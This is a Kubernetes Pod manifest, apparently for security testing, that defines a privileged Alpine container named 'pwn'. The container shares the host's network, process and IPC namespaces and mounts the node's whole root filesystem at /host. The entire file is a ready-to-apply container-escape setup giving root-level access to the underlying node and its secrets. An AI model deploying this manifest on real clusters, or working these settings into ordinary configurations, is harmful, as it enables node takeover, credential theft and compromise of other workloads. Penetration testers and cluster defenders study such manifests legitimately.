apiVersion: v1
kind: Pod
metadata:
  name: security-test
  namespace: default
spec:
  hostNetwork: true 
  hostPID: true
  hostIPC: true
  containers:
  - name: pwn
    image: alpine:latest
    command: ["sleep", "infinity"]
    securityContext:
      privileged: true
    volumeMounts:
    - name: hostfs
      mountPath: /host
  volumes:
  - name: hostfs
    hostPath:
      path: /
